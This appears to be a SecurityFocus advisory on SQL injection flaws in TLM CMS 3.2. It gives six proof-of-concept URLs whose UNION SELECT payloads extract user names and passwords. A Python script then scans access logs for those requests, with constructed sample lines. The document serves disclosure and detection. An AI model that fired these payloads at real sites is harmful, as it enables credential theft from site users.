TLM CMS Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*
http://www.example.com/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*
http://www.example.com/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*
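
A defensive check for the requests listed above, added here as an example and not part of the original advisory: it scans web server access logs for the six script and parameter pairs named in the proof-of-concept URIs and flags any value that is not a plain integer. It assumes combined-format access logs and that legitimate ids are non-negative integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> id parameter, taken from the proof-of-concept URIs in this advisory.
WATCHED = {
    "news.php": "id",
    "goodies.php": "idnews",
    "file.php": "id",
    "affichage.php": "ID",
    "mod_forum/afficher.php": "id_sal",
    "mod_forum/messages.php": "id_sujet",
}
VALID_ID = re.compile(r"\d+")  # assumption: legitimate ids are plain non-negative integers
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request field of a log entry


def suspicious_params(target):
    """Return [(script, param, decoded_value)] for watched ids that are not integers."""
    parts = urlsplit(target)
    hits = []
    for script, param in WATCHED.items():
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values; keep_blank_values so "id=" is also checked.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if not VALID_ID.fullmatch(value):
                hits.append((script, param, value))
    return hits


def scan(lines):
    """Yield (line_number, script, param, value) for every suspicious request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for hit in suspicious_params(match.group(1)):
                yield (number, *hit)


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /tlmcms32/news.php?act=lirenews&id=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/* HTTP/1.1" 200 733',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /tlmcms32/mod_forum/messages.php?id_sujet=4 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same integer-only rule can be enforced in front of the application (for example in a WAF or reverse proxy) until the affected scripts validate these parameters themselves.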


 

Copyright 2010, SecurityFocus